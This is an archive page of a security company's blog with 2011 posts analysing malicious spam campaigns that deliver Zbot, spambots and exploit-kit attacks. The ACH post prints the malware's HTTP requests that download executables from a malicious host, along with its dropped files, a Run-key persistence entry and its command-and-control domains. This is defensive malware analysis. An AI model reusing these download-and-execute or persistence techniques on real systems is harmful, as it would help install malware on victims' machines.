Malicious Spam « M86 Security Labs Blog

Posts Tagged ‘Malicious Spam’

An analysis of the ACH spam campaign

By Rodel Mendrez • September 6th, 2011 • Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

The malware code that attempts to connect to the control server

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Want to be friends on Facebook? Don’t click the link!

By Phil Hay • August 29th, 2011 • Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

By contrast, here is a legitimate Facebook friend request.

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

Malicious Spam on the increase again

By Rodel Mendrez • April 29th, 2011 • Spam

Malware distribution via email is far from dead. While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again

Your Music Order – a loaded PDF

By Phil Hay • March 31st, 2011 • Spam

We are noticing a spam campaign at the moment that purports to be a Music or Cell Phone “Order” with an attached PDF file with the following similar Subject lines:

Your Order No 129589 – Warner Music Inc.
Your Order No 489889 – Cell Phone Inc.

The attached PDF contains a bunch of obfuscated JavaScript, which attempts to exploit the Adobe getIcon vulnerability (CVE-2009-0927). If successful, the following payload is downloaded:

hxxp://kawabungashop.ru/flash/1.php

The 1.php file is an executable downloader (VirusTotal Report). Another piece of malware is then downloaded and installed (VirusTotal Report), which is a spambot that proceeds to spam further copies of the PDF file, as you can see from the template we captured:

These days, PDF files arriving in unexpected emails should be treated with extreme suspicion. And please be sure to keep your PDF reader meticulously up to date to avoid getting exploited by old vulnerabilities such as this.

Malicious Spam Campaign Preys on Japanese Disaster

By Phil Hay • March 17th, 2011 • Spam

There is a large-scale malicious spam campaign going on currently. The spam comes in a few different types, one of which imitates a Twitter notification. The subjects of the spam varies, but sadly, many focus on the recent events in Japan.

The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string

The links lead to a page hosting obfuscated malicious JavaScript, which seek to exploit a Java vulnerability. Our host was immediately compromised, botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed complete with scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers. As ever, remain on guard, especially when it comes to Twitter ‘notifications’.

Tags: Current Events | Cutwail | Japan | Malicious Spam | Twitter

UPS Spam.. Oh Wait, It’s an FDIC Spam Campaign

By Rodel Mendrez • February 15th, 2011 • Spam

After more than a week of malicious UPS spam campaigns, the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the Federal Deposit Insurance Corporation or FDIC claiming to notify users of important changes in FDIC regulations, hence a “document” is attached for further reading. However, the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com.

And even worse, yesterday it left the Subject line as “United Parcel Service notification #<6 digits>“. Fail!

FDIC spam campaign with Subject line and From field pertaining to UPS.

The ZIP attachment contains malware which aims to steal online banking credentials, the same payload as the last week’s UPS spam campaign.

Decompressing the ZIP file exposes an executable Trojan file bearing an Adobe PDF icon

This spam campaign contains enough weird errors for users to take notice that the email is indeed suspicious. It may not last however, we expect this spammer will fix or come up with new (and recycled) spam campaigns as they try to distribute their malware.

Tags: Cutwail | FDIC | Malicious Spam | UPS

Spammed Malware Ramps Up Again

By Phil Hay • February 14th, 2011 • Spam

It was probably too good to last. The past few months has been blissfully quiet on the spam front, and in particular, spam with accompanying malware. The chart below shows an unusually quiet period during December and January.

However, over the last week, we have seen the return of two familiar-looking malware spam campaigns.

Post Express: Package Available
United Parcel Service: Notification

While these two campaigns have similar themes, the spam originates from different spambots and has quite different payloads.

PDF Exploit Disguised as a Xerox Scanned Document

By Rodel Mendrez • February 7th, 2011 • Spam

Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks however, have imitated email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner.